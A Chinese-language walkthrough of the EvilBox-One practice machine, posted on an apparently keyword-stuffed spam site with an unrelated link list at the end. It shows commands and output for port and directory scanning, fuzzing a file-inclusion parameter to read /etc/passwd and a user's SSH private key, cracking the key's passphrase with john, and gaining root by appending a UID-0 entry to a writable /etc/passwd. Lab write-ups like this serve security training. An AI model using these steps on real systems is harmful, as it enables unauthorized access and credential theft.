当前位置: 首页 > wzjs >正文

做网站需要用到那些软件手机建站

wzjs 2025/8/1 1:27:29
做网站需要用到那些软件,手机建站,上海工作室,wordpress新站都该设置些什么主要知识点 类似黑盒测试,毫无线索的情况下只能去猜,如果是php文件则会比较容易达到入侵的目的即使有php文件了,由于不知道代码,只能测试一下有没有文件包含漏洞所以反正没线索的时候,就只能猜 具体步骤 nmap扫描&a…

主要知识点

  • 类似黑盒测试,毫无线索的情况下只能去猜,如果是php文件则会比较容易达到入侵的目的
  • 即使有php文件了,由于不知道代码,只能测试一下有没有文件包含漏洞
  • 所以反正没线索的时候,就只能猜

具体步骤

nmap扫描,只开放了80和22端口,而80端口也只是一个default页面,没有什么线索

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:58 UTC
Nmap scan report for 192.168.56.212
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works

但是nikto里包含了一些额外的信息, robots.txt和/secret/路径

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.212
+ Target Hostname:    192.168.56.212
+ Target Port:        80
+ Start Time:         2024-12-02 12:59:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-12-02 12:59:33 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt中的内容是`Hello H4x0r`,没有发现有什么用处,线索也不太多,所以强行爆破/secret/路径寻找php文件,发现了evil.php

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.225.212/secret/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]

强行试验一下有无文件包含漏洞,得知确实存在文件包含漏洞,而参数名为command

:\home\kali\Documents\OFFSEC\play\EvilBox-One> ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd -fs 0/'___\  /'___\           /'___\       /\ \__/ /\ \__/  __  __  /\ \__/       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      \ \_\   \ \_\  \ \____/  \ \_\       \/_/    \/_/   \/___/    \/_/       v2.1.0-dev
________________________________________________:: Method           : GET:: URL              : http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd:: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/Web-Content/common.txt:: Follow redirects : false:: Calibration      : false:: Timeout          : 10:: Threads          : 40:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500:: Filter           : Response size: 0
________________________________________________command                 [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 448ms]
:: Progress: [4730/4730] :: Job [1/1] :: 92 req/sec :: Duration: [0:00:57] :: Errors: 0 ::

通过先后包含 /etc/passwd和/home/mowree/.ssh/id_rsa文件获取到key文件用于登录,这里需要注意,如果是在浏览器中打开 http://192.168.225.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa ,则一定要用查看页面源码的 方式才能获取到格式化好的RSA key文件,否则无法使用

 

尝试用获得的key进行ssh登录,但是提示需要passphrase,试验了robots.txt里的内容,无效,用john爆破一下,获得了密码 unicorn,使用该passphrase可以成功登录

C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh2john id_rsa >id_rsa.hash                                 C:\home\kali\Documents\OFFSEC\play\EvilBox-One> john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)     
1g 0:00:00:00 DONE (2024-12-02 22:35) 33.33g/s 41600p/s 41600c/s 41600C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh -i id_rsa mowree@192.168.225.212                        
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$

登录后尝试了SUID,sudo -l都没有什么信息,但是在上传了linpeas.sh并运行后发现了 /etc/passwd对于所有用户都有读写权限

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 feb 10  2019 usr.bin.man═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

首先我们需要构造出一条记录,在插入到/etc/passwd后面就可以了

mowree@EvilBoxOne:~$ openssl passwd 1234
iQPI1FVnABms.
mowree@EvilBoxOne:~$ echo "tim:iQPI1FVnABms.:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:~$ su tim
Contraseña: 
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
d8033de92c0ee15a21ae22c39b979663
root@EvilBoxOne:/home/mowree# cat local.txt
07894098e76a0de660070a673dd51a6e

 

 

http://www.dtcms.com/wzjs/171279.html

相关文章:

  • 南通网站群建设免费b站网站推广
  • 绛县苗木网网站是由谁建设的网上引流推广怎么做
  • 有服务器怎么做网站教程郑州新闻发布
  • 海淀石家庄网站建设上海搜索排名优化
  • 做教育培训网站公司app软件下载站seo教程
  • 婚庆行业网站建设方案1全球十大搜索引擎
  • 有什么网站可以做微信支付接推广怎么收费
  • 网站建设氵金手指下拉十三沈阳seo排名优化推广
  • 佛山网站建设公司招聘河南企业网站建设
  • 标准网站建设价格优化防控措施
  • 做本地门户网站热门推广软件
  • 济南疫情防控最新通知北京网站seo招聘
  • 163企业邮箱注册入口关键词首页排名优化平台
  • 在线设计商标logo廊坊百度快照优化
  • 建设部网站办事大厅栏目郑州网站seo顾问
  • 什么腾讯网站做任务能刷q币谷歌google浏览器官方下载
  • 网页设计作品收获与思考热狗seo优化外包
  • 汕头市网站建设公司百度企业号
  • 上海建智咨询培训网站青岛seo服务公司
  • 日照网站建设多少钱广告投放
  • 一直免费的服务器下载安装seo优化是什么
  • 动漫设计工作室网站宣传片制作销售找客户的app
  • 公司网站的seo怎么做如何制作一个属于自己的网站
  • 网站返回首页按钮草根站长工具
  • 没有服务器 怎么做网站惠州seo排名收费
  • 政府网站排版布局深圳网络公司推广
  • 小7手游官网下载seo是什么意思?
  • 泉州网站推广排名seo人员培训
  • 做网站是先买域名seo外链优化策略
  • 转包网站建设做非法事情网站建站在线制作